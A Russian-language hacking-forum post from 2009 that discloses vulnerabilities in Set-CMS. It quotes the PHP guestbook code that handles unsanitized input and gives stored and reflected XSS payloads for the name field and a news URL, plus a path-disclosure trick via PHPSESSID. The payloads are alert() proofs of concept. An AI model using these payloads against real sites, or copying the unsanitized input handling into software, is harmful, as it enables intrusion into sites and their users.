Энциклопедия уязвимых скриптов

#11

31.10.2009, 09:10

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

С нами: 9154406

Репутация: 2221

Set-CMS

Оффициальная страничка

Активная XSS
Модуль гостевая книга

PHP код:


		
			
if ($mc == "ok")

{

 $title = "Сохранение сообщения";

 if (isset($_COOKIE['flood_feedback'])) {$er[] = "Флуд-защита.Подождите некоторое время...";}

 if (isset($_POST['user_name'])){setcookie("user_name", $_POST['user_name'], time()+333333333);}

 if (isset($_POST['user_email'])){setcookie("user_email", $_POST['user_email'], time()+333333333);}

 if (isset($_POST['user_icq'])){setcookie("user_icq", $_POST['user_icq'], time()+333333333);}

 if (isset($_SESSION[$uniqueid.'name_admin'])){$_POST['user_name'] = $_SESSION[$uniqueid.'name_admin'];}

 if (isset($_SESSION[$uniqueid.'email_admin'])){$_POST['user_email'] = $_SESSION[$uniqueid.'email_admin'];}

 if (isset($_SESSION[$uniqueid.'icq_admin'])){$_POST['user_icq'] = $_SESSION[$uniqueid.'icq_admin'];}

 $text_gb = saveuser($_POST['user_text']);

 $name = saveuser($_POST['user_name']);

 $email = saveuser($_POST['user_email']);

 $icq = saveuser($_POST['user_icq']);

 $code = $_POST['code'];

 if ($code == "") { $er[] = "Нет кода!";  }

 $ffile = file("files/feedback.set");

 for($a=0;$a<count($ffile);$a++) {

   $ee = explode("<>", $ffile[$a]);

   if ($ee[5] == $code)

   { $er[] = "Флудишь,мля!Отправлено только одно сообщение"; }

 }

В поле "Ваше имя" вставляем

Цитата:

"><script>alert();</script>

Эта же бага встречается в комментариях к новостям.
Тоже поле имя.

Раскрытие путей

Раскрытие путей с помощью PHPSESSID
Думаю обьяснения не нужны.

Пассивная XSS

Цитата:

/?set=news&mc=readfull&do=1"><script>alert();</script>

Последний раз редактировалось Ctacok; 31.10.2009 в 09:15..